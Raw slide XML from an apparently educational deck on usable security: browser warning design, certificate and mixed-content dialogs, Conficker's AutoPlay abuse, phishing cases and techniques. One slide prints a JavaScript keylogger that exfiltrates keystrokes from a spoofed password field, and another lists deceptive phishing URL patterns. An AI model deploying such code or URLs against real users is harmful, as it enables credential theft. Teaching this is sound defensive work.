              <a:stCxn id="11271" idx="1"/>
              <a:endCxn id="6" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3584062" y="3331631"/>
              <a:ext cx="2171699" cy="5792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857999" y="4894325"/>
            <a:ext cx="46046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How should the user make this decision?  No clear steps for user to follow.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590803" y="4916091"/>
            <a:ext cx="32480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“Yes”, the possibly less safe option, is the default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5A01E-CB16-F749-BBCE-98C50681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525932" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad Example: Mixed Content in IE6 (circa 2004)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26274043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051958" y="4343402"/>
            <a:ext cx="60374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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Even better (IE9):  load the safe content, and use the address bar to enable the rest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 2" descr="C:\Users\roreeder\Documents\Projects\TUXexamples\ie8httpsWar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905002"/>
            <a:ext cx="5514978" cy="1907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5214938"/>
            <a:ext cx="77597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38450" y="5291137"/>
            <a:ext cx="6286500" cy="2667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1107A-4A1A-8C43-9EEE-D4A21B24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(IE8)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D12475-1C22-7146-9B75-89DC2A558BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380949" y="1434299"/>
            <a:ext cx="4059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”Yes” does the safe thing by default!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41740457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5B1578-9B95-463A-91DE-797A98F7E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753F1F-C532-475B-BE0D-7359EB6F8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1107A-4A1A-8C43-9EEE-D4A21B24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Guidelines for Security Warnings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D287B6-8085-4476-951A-582A7A8653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3369899"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1859797"/>
          <a:ext cx="10401946" cy="4175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6947197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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="4700587"/>
            <a:ext cx="82296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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Most users will not understand “revocation information”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Choices are unclear, consequence is unclear.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17411" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7070725" y="3358756"/>
            <a:ext cx="738188" cy="506015"/>
            <a:chOff x="8001000" y="5486400"/>
            <a:chExt cx="738115" cy="674050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 7" descr="C:\Users\roreeder\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H42JTG30\MC900434741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860" y="5513969"/>
              <a:ext cx="642937" cy="64293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ounded Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8001000" y="5486400"/>
              <a:ext cx="738115" cy="674050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7412" name="Picture 2" descr="C:\Users\roreeder\Documents\Projects\TUXexamples\revocationInformationUnavailab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37364"/>
            <a:ext cx="5892119" cy="178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0045B-E637-5B4C-AA43-8DB06BBB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Example (IE6): Revoked SSL Certificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1354952421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 descr="C:\Users\roreeder\Documents\Projects\TUXexamples\ie8certWarningExpand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" t="22652" r="4298" b="9691"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819403" y="1977628"/>
            <a:ext cx="7712075" cy="37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414716" y="4622007"/>
            <a:ext cx="6981825" cy="80367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06775" y="1977631"/>
            <a:ext cx="4889500" cy="4024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78202" y="2912271"/>
            <a:ext cx="6818313" cy="4012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9003" y="3645694"/>
            <a:ext cx="3357563" cy="5715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3" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="2070498"/>
            <a:ext cx="1276350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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19464" name="TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="2829106"/>
            <a:ext cx="1276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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19465" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="3758191"/>
            <a:ext cx="25511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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Choices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19466" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="4718271"/>
            <a:ext cx="25511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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Process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B7A81-89C1-AD4A-8108-CD2E9084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Explanation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798309778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B0C-09A7-DC4B-8F76-E273B827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Chrome (2019)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557A7-E9D2-3849-AC67-214B08431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2" y="1695450"/>
            <a:ext cx="6005875" cy="4095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C80A74AD-DB39-D343-BED1-6459133EC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050" y="2643130"/>
            <a:ext cx="1276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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Risk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9F0FAFB8-821F-824A-8253-5F7CC5606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050" y="3231248"/>
            <a:ext cx="25511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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explanations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F5D57D8A-E057-5D46-BCA6-234DEFE63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050" y="5183222"/>
            <a:ext cx="25511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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Choices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1070775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97A803-A313-7447-92A7-E9BD7FCA1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42"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276602" y="1905002"/>
            <a:ext cx="6665579" cy="35096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E70874-0825-4449-9449-58A510CD78BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7720098" y="5536169"/>
            <a:ext cx="22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(expired certificate)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474EEA-85C4-0A46-8450-C08057C0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Chrome (2019)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20693F66-BD5B-214B-A09E-03F4CAB31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1903" y="3953632"/>
            <a:ext cx="1276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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Process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FD4E1154-8A23-414C-8F43-50A7C94B4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1903" y="4960204"/>
            <a:ext cx="25511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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Choice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373239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phishing email that hacked the account of John Podesta - CBS News">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD715F3C-50CB-5F49-A63C-A4BCDC633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441" y="1846508"/>
            <a:ext cx="4064430" cy="435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D7D337-D1F4-9B41-A564-6B96690C89DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5979763" y="1951672"/>
            <a:ext cx="4760562" cy="3416320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02122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brought Podesta to a fake log-in page where he entered his Gmail credentials.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The email was initially sent to the IT department as it was suspected of being a fake but was described as "legitimate" in an e-mail sent by a department employee, who later said he meant to write "illegitimate".</a:t>
            </a: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68C516-D0F9-4C42-B2E3-5931468F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“Change Your Password Immediately”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="845902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45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057403" y="4588668"/>
            <a:ext cx="8220075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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Attacker can abuse explanation causing bad user decisions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> virus to spread through USB drives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21507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738" y="2160984"/>
            <a:ext cx="3065462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Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4257676" y="1752600"/>
            <a:ext cx="27206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AutoPlay dialog in Vista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17FDE-F196-8341-8BCD-DED28B48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Explanation (Windows Vista)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2F25AD-D60F-324B-B73F-CFA08B19932B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543801" y="2514601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This is the name of a file on USB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03AFF2-ED6E-4F44-B9C1-09115DDC23D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6858001" y="3048000"/>
            <a:ext cx="685801" cy="3048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7145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45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3226593" y="4843807"/>
            <a:ext cx="64246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Windows 7 AutoPlay removed the auto-run option </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555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" t="6583" r="6480" b="7861"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2216946"/>
            <a:ext cx="4191000" cy="222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C6EE60-9CCB-4947-A2A1-96C88F90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Better Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10958231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404B5F-548D-8A41-B835-AF98F14D6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05" y="1009195"/>
            <a:ext cx="8178800" cy="213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84F85B-0C19-8843-9BA7-C4D4280B8AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2247315" y="5775205"/>
            <a:ext cx="9403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Sources: https://retruster.com/blog/2019-phishing-and-email-fraud-statistics.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>             https://www.proofpoint.com/us/corporate-blog/post/fbi-reports-125-billion-global-financial-losses-due-business-email-compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>             https://blog.knowbe4.com/this-year-phishing-causes-losses-of-17700-per-minute-and-ransomware-attacks-will-cost-22184-per-minute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8A5526-E077-CC40-AE2C-A9288C37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49" y="3505415"/>
            <a:ext cx="4631240" cy="226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display&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E74FB06-4909-4140-ADB3-9F16EC55F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105" y="3142795"/>
            <a:ext cx="6773836" cy="83405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AEB987C1-7C28-594C-9C97-B297D2BCE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705" y="2075358"/>
            <a:ext cx="4648200" cy="381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71431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D69C-E9E9-A14A-A53B-8338BEC8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Zirconium (APT31)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B5984-005C-6B42-A4B8-769685651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Zirconium, operating from China, has attempted to gain intelligence on organizations associated with the upcoming U.S. presidential election</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. The actor then sends the associated URL in either email text or an attachment to a targeted account. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site. For nation-state actors, this is a simple way to perform reconnaissance on targeted accounts to determine if the account is valid or the user is active.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4323A-EB02-624E-A01C-EE71A88043BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316405" y="6046129"/>
            <a:ext cx="830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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>blogs.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>biden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>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5FD9A8D-3F55-DE47-A9E7-3C61CDA3525D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3184218" y="4689747"/>
              <a:ext cx="7626240" cy="69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5FD9A8D-3F55-DE47-A9E7-3C61CDA352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6578" y="4671747"/>
                <a:ext cx="766188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CB5F0E7-51CC-9940-8A10-60EFBA72FBB9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1186578" y="5047947"/>
              <a:ext cx="390600" cy="12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CB5F0E7-51CC-9940-8A10-60EFBA72FB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8578" y="5029947"/>
                <a:ext cx="426240" cy="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499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7AA1D32-7F61-E540-BD5B-DFD47DB95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US" altLang="en-US"/>
              <a:t>Phishing Techniques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76B5E9E-A385-B945-8D3E-A578CF4627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00811" y="891241"/>
            <a:ext cx="6400407" cy="5075519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Use confusing URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gadula.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Wells.Fargo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>signin.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use URL with multiple redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>www.chase.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>url.php?url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>phish.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Host phishing sites on botnet zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Move from bot to bot using dynamic DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Pharming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Poison DNS tables so that address typed by victim (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>www.paypal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>) points to the phishing site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>URL checking doesn’t help!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214126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D4893D7B-0787-C943-8848-A46DCEAD7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Trusted Input Path Problem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8272E7F-3B94-E845-840C-DC1BD08F32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2103120"/>
            <a:ext cx="7451727" cy="384962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Users are easily tricked into entering passwords into insecure non-password fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;input  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type="text"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  name="spoof" 	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400" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onKeyPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="(new Image()).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		 ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keylogger.php?key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=’ +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>event.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>event.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> = 183;” &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397764" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407FD3BF-7657-4546-9B63-AC311D4E1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342" y="3907632"/>
